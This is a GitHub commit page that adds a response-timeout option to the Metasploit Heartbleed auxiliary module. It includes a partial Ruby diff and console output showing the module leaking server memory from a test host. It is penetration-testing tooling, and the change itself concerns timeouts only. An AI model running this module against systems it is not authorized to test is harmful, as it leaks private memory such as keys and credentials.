Skip to content

Commit 1cf1616

Browse files
ZinteraxZinterax
committed
Rebase. Add timeout option support
Rebase to account for the KEYS merge. Modify bleed() to work with timeout option. Modify establish_connect() to work with timeout option. Modify loot_and_report() to work with timeout option. ---Test Console Output--- Client Hello Timeout: msf auxiliary(openssl_heartbleed) > run [*] 127.0.0.1:443 - Sending Client Hello... [-] 127.0.0.1:443 - No Client Hello response after 10 seconds... [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed Patched Apache: msf auxiliary(openssl_heartbleed) > run [*] 127.0.0.1:443 - Sending Client Hello... [*] 127.0.0.1:443 - Sending Heartbeat... [-] 127.0.0.1:443 - No Heartbeat response... [-] 127.0.0.1:443 - Looks like there isn't leaked information... [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed Vulnerable Server: msf auxiliary(openssl_heartbleed) > run [*] 192.168.1.3:443 - Sending Client Hello... [*] 192.168.1.3:443 - Sending Heartbeat... [*] 192.168.1.3:443 - Heartbeat response, 17403 bytes [+] 192.168.1.3:443 - Heartbeat response with leak [*] 192.168.1.3:443 - Printable info leaked: STUFF STUFF STUFF [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
1 parent 021ac53 commit 1cf1616

File tree

1 file changed

+22
-9
lines changed

1 file changed

+22
-9
lines changed

modules/auxiliary/scanner/ssl/openssl_heartbleed.rb

Lines changed: 22 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -110,7 +110,8 @@ def initialize
110110
'juan vazquez', # Msf module
111111
'Sebastiano Di Paola', # Msf module
112112
'Tom Sellers', # Msf module
113-
'jjarmoc' #Msf module; keydump, refactoring..
113+
'jjarmoc', #Msf module; keydump, refactoring..
114+
'Ben Buchanan' #Msf module
114115
],
115116
'References' =>
116117
[
@@ -140,7 +141,8 @@ def initialize
140141
OptEnum.new('TLS_VERSION', [true, 'TLS/SSL version to use', '1.0', ['SSLv3','1.0', '1.1', '1.2']]),
141142
OptInt.new('MAX_KEYTRIES', [true, 'Max tries to dump key', 10]),
142143
OptInt.new('STATUS_EVERY', [true, 'How many retries until status', 5]),
143-
OptRegexp.new('DUMPFILTER', [false, 'Pattern to filter leaked memory before storing', nil])
144+
OptRegexp.new('DUMPFILTER', [false, 'Pattern to filter leaked memory before storing', nil]),
145+
OptInt.new('RESPONSE_TIMEOUT', [true, 'Number of seconds to wait for a server response', 10])
144146
], self.class)
145147

146148
register_advanced_options(
@@ -186,6 +188,10 @@ def peer
186188
"#{rhost}:#{rport}"
187189
end
188190

191+
def response_timeout
192+
datastore['RESPONSE_TIMEOUT']
193+
end
194+
189195
def tls_smtp
190196
# https://tools.ietf.org/html/rfc3207
191197
sock.get_once
@@ -237,15 +243,15 @@ def jabber_connect_msg(hostname)
237243

238244
def tls_jabber
239245
sock.put(jabber_connect_msg(datastore['XMPPDOMAIN']))
240-
res = sock.get
246+
res = sock.get(response_timeout)
241247
if res && res.include?('host-unknown')
242248
jabber_host = res.match(/ from='([\w.]*)' /)
243249
if jabber_host && jabber_host[1]
244250
disconnect
245251
connect
246252
vprint_status("#{peer} - Connecting with autodetected remote XMPP hostname: #{jabber_host[1]}...")
247253
sock.put(jabber_connect_msg(jabber_host[1]))
248-
res = sock.get
254+
res = sock.get(response_timeout)
249255
end
250256
end
251257
if res.nil? || res.include?('stream:error') || res !~ /<starttls xmlns=['"]urn:ietf:params:xml:ns:xmpp-tls['"]/
@@ -254,14 +260,14 @@ def tls_jabber
254260
end
255261
msg = "<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>"
256262
sock.put(msg)
257-
res = sock.get
263+
res = sock.get(response_timeout)
258264
return nil if res.nil? || !res.include?('<proceed')
259265
res
260266
end
261267

262268
def tls_ftp
263269
# http://tools.ietf.org/html/rfc4217
264-
res = sock.get
270+
res = sock.get(response_timeout)
265271
return nil if res.nil?
266272
sock.put("AUTH TLS\r\n")
267273
res = sock.get_once
@@ -291,7 +297,7 @@ def run_host(ip)
291297

292298
def bleed()
293299
# This actually performs the heartbleed portion
294-
establish_connect
300+
return :timeout if (establish_connect) == :timeout
295301
vprint_status("#{peer} - Sending Heartbeat...")
296302
sock.put(heartbeat(heartbeat_length))
297303
hdr = sock.get_once(5)
@@ -335,6 +341,7 @@ def bleed()
335341
end
336342

337343
def loot_and_report(heartbeat_data)
344+
return if heartbeat_data == :timeout
338345
if heartbeat_data
339346
print_good("#{peer} - Heartbeat response with leak")
340347
report_vuln({
@@ -344,7 +351,7 @@ def loot_and_report(heartbeat_data)
344351
:refs => self.references,
345352
:info => "Module #{self.fullname} successfully leaked info"
346353
})
347-
if action.name == 'DUMP' # Check mode, dump if requested.
354+
if datastore['MODE'] == 'DUMP' # Check mode, dump if requested.
348355
pattern = datastore['DUMPFILTER']
349356
if pattern
350357
match_data = heartbeat_data.scan(pattern).join
@@ -506,7 +513,12 @@ def establish_connect
506513
vprint_status("#{peer} - Sending Client Hello...")
507514
sock.put(client_hello)
508515

509-
server_hello = sock.get
516+
server_hello = sock.get(response_timeout)
517+
unless server_hello
518+
vprint_error("#{peer} - No Client Hello response after #{response_timeout} seconds...")
519+
return :timeout
520+
end
521+
510522
unless server_hello.unpack("C").first == HANDSHAKE_RECORD_TYPE
511523
vprint_error("#{peer} - Server Hello Not Found")
512524
return
@@ -534,3 +546,4 @@ def key_from_pqe(p, q, e)
534546
end
535547

536548
end
549+

0 commit comments

Comments
 (0)